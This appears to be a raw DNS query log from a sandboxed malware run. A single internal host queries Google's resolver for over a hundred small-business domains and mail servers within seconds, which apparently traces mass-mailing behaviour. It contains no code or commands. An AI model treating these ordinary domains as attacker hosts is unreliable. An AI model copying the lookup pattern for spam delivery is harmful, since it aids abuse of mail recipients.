                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:26.882255077 CEST192.168.2.48.8.8.80xe670Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.118937016 CEST192.168.2.48.8.8.80x7d3Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.168839931 CEST192.168.2.48.8.8.80xd2Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.169308901 CEST192.168.2.48.8.8.80x8d3Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.568701982 CEST192.168.2.48.8.8.80x2a47Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.688401937 CEST192.168.2.48.8.8.80x60f5Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.943114042 CEST192.168.2.48.8.8.80x401bStandard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:27.961136103 CEST192.168.2.48.8.8.80x887cStandard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:28.001377106 CEST192.168.2.48.8.8.80x97b1Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:28.969681978 CEST192.168.2.48.8.8.80x6c7bStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:28.992605925 CEST192.168.2.48.8.8.80x3366Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:30.207210064 CEST192.168.2.48.8.8.80x1fe8Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:30.625766993 CEST192.168.2.48.8.8.80xbaf3Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:30.626189947 CEST192.168.2.48.8.8.80x9d1dStandard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:31.708389044 CEST192.168.2.48.8.8.80xf33aStandard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.191842079 CEST192.168.2.48.8.8.80xe319Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.196628094 CEST192.168.2.48.8.8.80x2872Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.204401970 CEST192.168.2.48.8.8.80xc8f0Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.207757950 CEST192.168.2.48.8.8.80x4684Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.208446026 CEST192.168.2.48.8.8.80xf7deStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.257430077 CEST192.168.2.48.8.8.80xd8dcStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.257513046 CEST192.168.2.48.8.8.80xf86aStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.257565975 CEST192.168.2.48.8.8.80x35a8Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.260936975 CEST192.168.2.48.8.8.80x21d4Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.278827906 CEST192.168.2.48.8.8.80xf30dStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.285026073 CEST192.168.2.48.8.8.80xf1b7Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.287110090 CEST192.168.2.48.8.8.80x28eaStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.291733027 CEST192.168.2.48.8.8.80xdc51Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.294478893 CEST192.168.2.48.8.8.80x43a3Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.296127081 CEST192.168.2.48.8.8.80x4c02Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.345252037 CEST192.168.2.48.8.8.80xa8a0Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.361721039 CEST192.168.2.48.8.8.80x137cStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.391295910 CEST192.168.2.48.8.8.80xd4dbStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.396972895 CEST192.168.2.48.8.8.80xda09Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.402261019 CEST192.168.2.48.8.8.80xc9a9Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.407450914 CEST192.168.2.48.8.8.80xeb8aStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.407757998 CEST192.168.2.48.8.8.80x47f4Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.437814951 CEST192.168.2.48.8.8.80x12e5Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.483686924 CEST192.168.2.48.8.8.80x77c1Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.515805006 CEST192.168.2.48.8.8.80xa70Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.527312994 CEST192.168.2.48.8.8.80xa451Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.540776014 CEST192.168.2.48.8.8.80xa851Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.542321920 CEST192.168.2.48.8.8.80x8703Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.546758890 CEST192.168.2.48.8.8.80x97bbStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.553112030 CEST192.168.2.48.8.8.80xbf35Standard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.569529057 CEST192.168.2.48.8.8.80x7c3aStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.569586039 CEST192.168.2.48.8.8.80x3763Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.572664022 CEST192.168.2.48.8.8.80x91bStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.572734118 CEST192.168.2.48.8.8.80xc4a0Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.585581064 CEST192.168.2.48.8.8.80x762eStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.590131998 CEST192.168.2.48.8.8.80x54a6Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.598507881 CEST192.168.2.48.8.8.80x478fStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.605806112 CEST192.168.2.48.8.8.80x2221Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.619832039 CEST192.168.2.48.8.8.80xc616Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.687834978 CEST192.168.2.48.8.8.80xdfb7Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.718918085 CEST192.168.2.48.8.8.80x73a0Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.729430914 CEST192.168.2.48.8.8.80x6dbdStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.745291948 CEST192.168.2.48.8.8.80x3913Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.750149965 CEST192.168.2.48.8.8.80x67b6Standard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.764770985 CEST192.168.2.48.8.8.80xb221Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.775933981 CEST192.168.2.48.8.8.80xb1f6Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.786412001 CEST192.168.2.48.8.8.80xd3c5Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.828830957 CEST192.168.2.48.8.8.80xba82Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.830552101 CEST192.168.2.48.8.8.80x78adStandard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.830636978 CEST192.168.2.48.8.8.80xa45Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.831398010 CEST192.168.2.48.8.8.80x9723Standard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.835570097 CEST192.168.2.48.8.8.80xc556Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.839847088 CEST192.168.2.48.8.8.80x3031Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.842627048 CEST192.168.2.48.8.8.80x6c43Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.890162945 CEST192.168.2.48.8.8.80x1c26Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.897670031 CEST192.168.2.48.8.8.80x7176Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.905728102 CEST192.168.2.48.8.8.80xe534Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.920896053 CEST192.168.2.48.8.8.80x593bStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.935117006 CEST192.168.2.48.8.8.80xbe1fStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.945431948 CEST192.168.2.48.8.8.80x15dStandard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.946250916 CEST192.168.2.48.8.8.80xcf95Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.968498945 CEST192.168.2.48.8.8.80xdc3fStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.980515957 CEST192.168.2.48.8.8.80x1bb1Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.986601114 CEST192.168.2.48.8.8.80x81d1Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:33.999615908 CEST192.168.2.48.8.8.80x3974Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.000467062 CEST192.168.2.48.8.8.80x4883Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.001807928 CEST192.168.2.48.8.8.80x31f1Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.026026964 CEST192.168.2.48.8.8.80x3182Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.055264950 CEST192.168.2.48.8.8.80xe3cbStandard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.059756994 CEST192.168.2.48.8.8.80xb008Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.084847927 CEST192.168.2.48.8.8.80xcf36Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.088661909 CEST192.168.2.48.8.8.80xd9deStandard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.119499922 CEST192.168.2.48.8.8.80x23dcStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.150913000 CEST192.168.2.48.8.8.80xb9aStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.177294016 CEST192.168.2.48.8.8.80x6819Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.201479912 CEST192.168.2.48.8.8.80x6678Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.210104942 CEST192.168.2.48.8.8.80xa5bdStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.210520029 CEST192.168.2.48.8.8.80xf6a5Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.247761965 CEST192.168.2.48.8.8.80xadd6Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.247833967 CEST192.168.2.48.8.8.80x9d8eStandard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.247906923 CEST192.168.2.48.8.8.80x9f0cStandard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.250858068 CEST192.168.2.48.8.8.80x74dStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.255193949 CEST192.168.2.48.8.8.80xcc0bStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.257016897 CEST192.168.2.48.8.8.80xa14aStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.261857986 CEST192.168.2.48.8.8.80x63f2Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.268003941 CEST192.168.2.48.8.8.80x37e4Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.271713018 CEST192.168.2.48.8.8.80xe325Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.275373936 CEST192.168.2.48.8.8.80x6325Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.277172089 CEST192.168.2.48.8.8.80x462bStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.278285980 CEST192.168.2.48.8.8.80xfb0eStandard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.294456959 CEST192.168.2.48.8.8.80xb475Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.295507908 CEST192.168.2.48.8.8.80x62f3Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.370623112 CEST192.168.2.48.8.8.80xd2cStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.372122049 CEST192.168.2.48.8.8.80x823fStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.392158985 CEST192.168.2.48.8.8.80xee49Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.399854898 CEST192.168.2.48.8.8.80xde22Standard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.406049967 CEST192.168.2.48.8.8.80xc2c8Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.413165092 CEST192.168.2.48.8.8.80x9dc8Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.426615953 CEST192.168.2.48.8.8.80xf666Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.431651115 CEST192.168.2.48.8.8.80x8547Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.436496019 CEST192.168.2.48.8.8.80xbaeaStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.437968969 CEST192.168.2.48.8.8.80x3d71Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.441433907 CEST192.168.2.48.8.8.80x495aStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.446235895 CEST192.168.2.48.8.8.80xb832Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.448637962 CEST192.168.2.48.8.8.80x72b4Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.459142923 CEST192.168.2.48.8.8.80xb59cStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.480730057 CEST192.168.2.48.8.8.80x892Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.487464905 CEST192.168.2.48.8.8.80xf9b1Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.491548061 CEST192.168.2.48.8.8.80xccb2Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.519365072 CEST192.168.2.48.8.8.80x8283Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.538904905 CEST192.168.2.48.8.8.80x293Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.612663984 CEST192.168.2.48.8.8.80x762eStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.619348049 CEST192.168.2.48.8.8.80xc4a0Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.635493040 CEST192.168.2.48.8.8.80x467aStandard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.641071081 CEST192.168.2.48.8.8.80x66ccStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.653652906 CEST192.168.2.48.8.8.80xc3bcStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.669256926 CEST192.168.2.48.8.8.80x4200Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.743664026 CEST192.168.2.48.8.8.80x82e0Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.769757986 CEST192.168.2.48.8.8.80x8b5Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.777559996 CEST192.168.2.48.8.8.80x7fe0Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.779740095 CEST192.168.2.48.8.8.80xc03Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.790962934 CEST192.168.2.48.8.8.80x5ea4Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.808382988 CEST192.168.2.48.8.8.80xa6a1Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.808433056 CEST192.168.2.48.8.8.80x5984Standard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.813924074 CEST192.168.2.48.8.8.80x488Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.813924074 CEST192.168.2.48.8.8.80x4c55Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.814018011 CEST192.168.2.48.8.8.80xeaa4Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.814589024 CEST192.168.2.48.8.8.80x69ecStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.815025091 CEST192.168.2.48.8.8.80xb173Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.818150043 CEST192.168.2.48.8.8.80x82e5Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.818243027 CEST192.168.2.48.8.8.80xc57bStandard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.838821888 CEST192.168.2.48.8.8.80x4179Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.839787960 CEST192.168.2.48.8.8.80x3094Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.841466904 CEST192.168.2.48.8.8.80xca6bStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.845184088 CEST192.168.2.48.8.8.80x606eStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.864738941 CEST192.168.2.48.8.8.80xc4f5Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.879436970 CEST192.168.2.48.8.8.80xb76bStandard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.889513016 CEST192.168.2.48.8.8.80xdab9Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.910552025 CEST192.168.2.48.8.8.80xe63fStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.922624111 CEST192.168.2.48.8.8.80x9d9eStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:34.933304071 CEST192.168.2.48.8.8.80x2e4cStandard query (0)78san.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.009454966 CEST192.168.2.48.8.8.80x82a8Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.016556978 CEST192.168.2.48.8.8.80x4883Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.099361897 CEST192.168.2.48.8.8.80xa43aStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.104726076 CEST192.168.2.48.8.8.80x3d31Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.112034082 CEST192.168.2.48.8.8.80xeb20Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.237174988 CEST192.168.2.48.8.8.80x784cStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.270190001 CEST192.168.2.48.8.8.80xa72dStandard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.307338953 CEST192.168.2.48.8.8.80xc6b7Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.425228119 CEST192.168.2.48.8.8.80xfc44Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.444447994 CEST192.168.2.48.8.8.80x781cStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.523503065 CEST192.168.2.48.8.8.80xdb03Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.561331987 CEST192.168.2.48.8.8.80xca10Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.563580036 CEST192.168.2.48.8.8.80xe9adStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.568466902 CEST192.168.2.48.8.8.80x3a2dStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.569380045 CEST192.168.2.48.8.8.80x100cStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.624993086 CEST192.168.2.48.8.8.80xc4a0Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.647520065 CEST192.168.2.48.8.8.80x72bbStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jul 27, 2023 21:53:35.665920973 CEST192.168.2.48.8.8.80x185eStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
